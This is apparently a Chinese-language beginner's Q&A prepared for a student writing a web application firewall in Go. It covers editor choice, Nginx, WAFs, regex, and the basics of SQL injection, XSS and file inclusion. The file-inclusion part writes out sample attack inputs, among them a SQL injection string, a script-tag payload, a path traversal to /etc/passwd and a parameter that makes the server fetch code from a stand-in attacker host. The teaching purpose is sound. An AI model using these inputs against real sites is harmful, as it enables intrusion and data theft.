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資安與 Go 語言基礎知識 Q&amp;A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這份文件針對你在開發 WAF 專案前遇到的基礎問題進行白話文解答，幫助你快速建立資安防禦的概念。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我該使用哪個 IDE 環境編寫 Go？可以使用 Visual Studio 2022 嗎？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不建議使用 Visual Studio 2022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雖然 VS 2022 是地表最強的 IDE 之一，但它主要是為微軟生態系（如 C#, C++, .NET）設計的，對 Go 語言的支援並非一線等級。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推薦的開發環境（二選一）：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Studio Code (VS Code)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：這與 VS 2022 不同，是一套輕量級的編輯器。它是目前全世界寫 Go 最主流、最推薦的免費工具。你只需要安裝 VS Code，然後在裡面安裝官方的「Go」擴充套件，就能獲得極佳的程式碼提示與除錯功能。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GoLand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 JetBrains 公司開發的付費 IDE，功能最強大，但需要購買授權（學生有免費教育版）。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結論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：請下載並安裝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作為你的 Go 開發環境。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Nginx 和 WAF 是什麼？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這兩個都是網路架構中的重要元件，但負責的工作不同。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Nginx (發音為 Engine-X)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它是一個超高效能的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網頁伺服器（Web Server）與反向代理伺服器（Reverse Proxy）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。你可以把它想像成大樓的「警衛室與總機」。當使用者輸入網址連線時，Nginx 會最先接到流量，它可以幫忙處理 HTTPS 加密（憑證）、把靜態圖片直接給使用者，或者把複雜的請求轉接給後端的系統。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WAF (Web Application Firewall - 網頁應用程式防火牆)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傳統的防火牆只看「IP 和 Port」（例如阻擋某個國家的 IP 連線）。而 WAF 則是「看得懂網頁內容」的保鑣。它會拆開 HTTP 封包，檢查你的網址、輸入框內容、Cookie 裡面有沒有夾帶駭客的攻擊指令。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在我們的專案中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：Nginx 負責在最外層把 HTTPS 解密成 HTTP，然後交給「我們自己用 Go 寫的 WAF」來檢查裡面有沒有炸彈（攻擊指令），檢查安全後才放行給真正的網站。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Regex (正規表達式) 是什麼？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Regex (Regular Expression，正規表達式)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是一種用來「描述或匹配字串特徵」的強大語法。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你可以把它想像成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超級升級版的 Ctrl+F (搜尋)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普通的搜尋只能找一模一樣的字（例如搜尋 "apple"）。但 Regex 可以找「模式（Pattern）」。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例子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：你想找出文章中所有的台灣手機號碼。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普通搜尋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：你沒辦法搜，因為號碼太多種了。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Regex 搜尋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：你可以寫成 ^09\d{8}$。這段像亂碼的符號意思是：「以 09 開頭，後面跟著 8 個數字，然後結束」。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WAF 中，我們就是利用 Regex 寫出「駭客攻擊指令的特徵」。只要使用者的輸入符合這個特徵，WAF 就會立刻攔截！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SQLi、XSS、LFI/RFI 是什麼？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這些是目前世界上最常見，也是 OWASP Top 10（十大資安漏洞）常客的網頁攻擊手法：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💉 SQLi (SQL Injection / 資料庫隱碼攻擊)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：網站的登入框或搜尋框，原本是讓使用者輸入「帳號」或「關鍵字」。駭客卻故意輸入「資料庫指令 (SQL)」。如果網站沒有檢查就直接把這些指令送到資料庫執行，駭客就能繞過密碼登入，甚至把整個資料庫偷走或刪除。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駭客輸入範例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：' OR 1=1 -- （這能欺騙資料庫，讓密碼驗證永遠為真）。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🎭 XSS (Cross-Site Scripting / 跨站腳本攻擊)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：駭客在網站的留言板或個人資料中，偷偷植入惡意的 JavaScript 程式碼。當其他正常使用者瀏覽這個網頁時，瀏覽器會不小心執行這些惡意程式碼。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後果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：駭客可以藉此偷走正常使用者的登入憑證 (Cookie)，直接盜用他們的帳號。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駭客輸入範例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：&lt;script&gt;alert('偷走你的密碼！')&lt;/script&gt;。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LFI / RFI (Local / Remote File Inclusion / 檔案包含漏洞)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：這通常發生在網站會根據網址參數來讀取檔案的時候（例如：website.com/page?file=about.php）。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LFI (本地)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：駭客把參數改成 file=../../../../etc/passwd，藉由目錄穿越，偷看伺服器系統底層的機密密碼檔。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RFI (遠端)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：駭客把參數改成 file=http://hacker.com/virus.php，強迫你的伺服器去下載並執行駭客的病毒程式，導致伺服器直接被控制。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